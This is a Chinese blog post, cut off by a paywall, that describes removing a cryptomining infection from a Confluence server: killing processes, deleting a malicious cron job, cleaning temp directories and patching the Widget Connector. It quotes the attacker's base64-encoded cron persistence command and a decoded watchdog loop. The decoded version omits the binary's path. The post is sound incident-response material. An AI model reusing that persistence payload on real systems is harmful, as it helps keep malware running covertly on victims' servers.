confluence挖矿病毒(kdevtmpfsi 、solrd)解决

已于 2023-05-05 14:22:14 修改
阅读量3.5k 收藏 3
点赞数
文章标签: java confluence
于 2021-01-12 10:05:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lin351550660/article/details/112507029
版权

自己安装了conference,没用1周。发现服务器内存被吃完了。

定位问题:

1、之前就听说过confluence 有漏洞 攻击者会利用confluence编辑页面的某个参数进行写入攻击。所以直接在百度搜索:confluence挖矿病毒

2、感谢 https://www.cnblogs.com/hack404/p/11464890.html 作者的帮助。

处理过程:

1. 先封掉外网HTTP 端口

使用腾讯云控制台 安全组 设置80端口不允许访问。

2. 查杀进程

使用命令:top 查看pid 并使用 kill -9 ‘pid’

发现进程越杀越多,继续看文档。

3.查看是否存在定时任务

使用命令:crontab -l

发现这些是 腾讯云的定时任务。

再使用命令: crontab -l -u confluence2 查看

发现与文档一样的定时任务

* * * * * echo -n "KCB3aGlsZSA6IDsgZG8gc2xlZXAgNSA7IGlmICEga2lsbCAtMCAyNzMxNiA+L2Rldi9udWxsIDI+JjEgOyB0aGVuIC9vcHQvYXRsYXNzaWFuL2NvbmZsdWVuY2UvdGVtcC9ya3dwcm4gOyBmaSA7IGRvbmUgKSAmIHBpZD0kISA7IChzbGVlcCAyNSAmJiBraWxsIC05ICRwaWQpICY=" | base64 -d | sh >/dev/null 2>&1

base64 解密为:

( while : ; do sleep 5 ; if ! kill -0 27316 >/dev/null 2>&1 ; then rkwprn ; fi ; done ) & pid=$! ; (sleep 25 && kill -9 $pid) &

我的神,死循环怪不得CPU 那么高。。。

4.杀死定时任务

使用命令:crontab -r -u confluence2

查询定时任务为空

5.清除/tmp/下所有confluence2 用户创建的目录

该目录为病毒文件

6.清除/opt/atlassian/confluence/temp/ 下所有confluence2 用户创建的目录

不是非常清楚是什么文件。应该是攻击confluence 的病毒文件

7.升级confluence

安全建议

以下任选一种皆可修复漏洞

a、升级至安全版本。下载链接:

https://www.atlassian.com/software/confluence/download/

https://atlassian.com/software/confluence/download/data-center

b、升级Widget Connector 组件。

Linux系统运行如下命令查找widgetconnector-*.jar文件所在位置:

find / -name "widgetconnector-*"

下载最新版本的widgetconnector-3.1.4.jar替换,并重启Confluence应用

我们选用的是 B方案 替换 ja

最低0.47元/天 解锁文章
lin351550660
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
confluence插件tableenhancer
04-16
为了解决这个问题,出现了"Table Enhancer"插件。 "Table Enhancer"是专为Confluence设计的一款增强型插件,其主要功能是提供固定的表头。当用户在页面中插入表格并启用此插件后,即使在向下滚动页面时,表头也会...
Confluence7安装部署插件包
11-24
在本教程中,我们将深入探讨如何安装和部署“Confluence7”这个强大的协作与知识管理平台,并重点关注如何处理其中的插件包。Confluence是由Atlassian公司开发的一款企业级wiki工具,它允许团队成员共享文档、协作...
警惕!利用Confluence最新漏洞传播的Linux挖矿病毒seasame
systemino的博客
04-25 2717
一、现象描述 近日,深信服EDR产品率先检测到一款新型Linux挖矿木马,经深信服安全专家分析,该病毒利用Confluence漏洞传播,通过定时下载对病毒体进行保活,同时由于病毒会杀掉包含“https://”、“http://”的进程,将导致用户无法下载文件及访问网页,挖矿进程会导致服务器出现卡顿等异常现象。深信服安全团队对该挖矿木马进行了详细的技术分析,并根据其母体文件名将其命名为seasam...
利用 Confluence 漏洞的挖矿木马
Nikkis的博客
02-08 495
利用 Confluence 漏洞的挖矿木马
记录清除挖矿病毒 solrd 过程
最新发布
爱摄影的小章同学的博客
06-12 546
删除完成发现 所有进程都不见了,此时吓懵了,因为是现网,产线还有很多消息正在往kafka里写数据,。端午节期间,kafka 服务器被黑客攻击了,植入了挖矿病毒 solrd,这个病毒很聪明,内存,CPU并没有异常升高,以致于上班第一天完全没有察觉。此时看到消费kafka 服务都还在,没有注意到第一行的 /tmp/.solr/solrd 病毒,此时它还没有占用多少CPU跟内存。刚kill 完成 再次top -c 发现这个病毒有换了一个进程的id 又起来了,试了几次都没用,于是 查到病毒执行的文件夹。
confluence中kthreaddk挖矿病毒处理
weixin_44024436的博客
09-13 197
confluence中kthreaddk挖矿病毒处理
docker confluence挖矿病毒处理及版本升级
qq_41411704的博客
09-14 1861
【前提】 公司自建的confluence 被植入挖矿病毒了。导致cpu异常,疯狂的对外发包。 一【排查】 docker 版本 6.7.2 cptactionhank/atlassian-confluence:6.7.2 1.挖矿病毒kdevtmpfsi kinsing solrd 就是换着名称来挖矿。 1.定位病毒 #查找出异常的pid,直接kill top #查找出关联下此进程的pid,可以找到父进程等信息 systemctl status pid 2.处理病毒 禁用定时任务,删除异常目录,删除源头 c
AWS 云服务器中kdevtmpfsi挖矿病毒处理方法
qq_38829237的博客
11-17 943
亚马逊云 kdevtmpfsi 挖矿病毒处理记录
confluence使用手册.docx
12-03
它提供了一个灵活的知识管理解决方案,旨在帮助团队和组织高效地创建、共享和管理知识内容。Confluence 支持多种类型的内容,包括文本、图片、视频、音频等,可以满足不同类型的知识管理需求。 1.1 用途 ...
confluence源码
02-20
Confluence是一款由Atlassian公司开发的企业级协作wiki平台,它提供了强大的文档创建、共享和协作功能,被广泛用于团队知识管理、项目协作和文档组织。本文将深入解析Confluence 6.12版本的源代码,揭示其核心设计与...
confluence镜像
07-18
confluence的docker镜像
记一次解决被恶意植入挖矿程序kdevtmpfsi的过程
954L
06-10 1950
起因 收到一封腾讯云的邮件,内容如下 一开始没在意,以为是腾讯云误判(还是我太年轻),毕竟我也没调用任何别人6379端口 的业务,俺自己的redis端口也改了不是这个,所以有点莫名其妙,就没理。 谁知道当天就出现业务异常卡顿,网络通信存在异常延迟等问题,顺带查看了一下腾讯云自带的免费云监控(没有广告费),7天网络如下图 最高的时候到了15M,感觉有点小DDOS的意思了…难怪腾讯云以为我攻击别人,现在才引起我注意,连上服务器敲一个top,就看到了挖矿程序:kdevtmpfsi kdevtmpfs
linux服务器 kdevtmpfsi solrd 病毒处理 记住一定要多删除几次。重启
Super_man54188的博客
02-20 1095
所有中病毒 无非是cpu内存占用高 一定要断公网地址 修改root密码 删除history历史记录 history -c 映射端口也要注意 solrd病毒 公司服务器负载突然上来了,用top命令查看,发现了一个很诡异的进程 然后grep这个进程的进程号,发现是运行在/tmp/.solr/solrd下;于是赶紧杀进程,删程序,负载就下来了;但是还没有完,用top命令再次查看的时候惊...
团队协作软件之confluence部署和解密
最美dee时光的博客
04-21 1185
1 简介 Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送;同时可以做技术博客,发送文章,下面评论,点赞。 2 软件版本 centos7.6 java jdk 1.8 Mysql5.7.27 confluence 6.15.9 3 环境准备 3.1 JDK1.8安装...
针对kdevtmpfsi病毒内容的分析与清理
热门推荐
a1308422754的博客
12-28 3万+
中毒症状: 服务器cpu负载升高 top查看进程 会发现一个名为kdevtmpfsi 的程序在占用 杀掉之后重启可以推测有守护进程 排查后守护进程为kinsing 杀掉守护进程 间隔一会又重新启动 定时任务中有每秒都在执行的脚本 要删掉 间隔一星期或者两个星期又卷土重来 建议 挖矿程序可以通过docker镜像下载服务和redis 动态加载配置 获取主机权限 1、平时中间件要绑定内网网卡,禁止bind 0.0.0.0的情况出现 2、用低权限用户启动 3、统一更换常用端口 4、redis设置2.
继续深挖挖矿病毒solr中毒途径
flye的专栏
02-23 477
今天突然通过grafana 集群的网卡流量异常,查看hadoop集群有dr.who用户执行yarn 任务。
清除挖矿病毒solr记录
flye的专栏
02-20 1405
solr病毒cpu占用100%,导致node节点挂掉,正常情况下,一般node节点不会挂掉,进入节点,发现果然node挂掉。
应急响应-挖矿病毒(kswapd0)
weixin_45690589的博客
10-10 1142
应急响应-挖矿病毒(kswapd0)
linux solr进程,Solr在Linux中的安装
weixin_36488250的博客
05-01 192
在Linux下进行安装:我已经将压缩包放在了虚拟机下面了,然后开始进行解压缩.tar -zxvf solr-4.10.3.tar解压完会多一个文件夹.在bin目录下会有这样的一个目录,其中的这个solr.cmd是使用(内嵌)jetty服务器进行运行的,然后solr.cmd在这个服务器中运行时,只能在测试时候使用,所以我们不会在这里进行启动solr.第二个文件中都是插件,来进行导入和导出,dist中...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值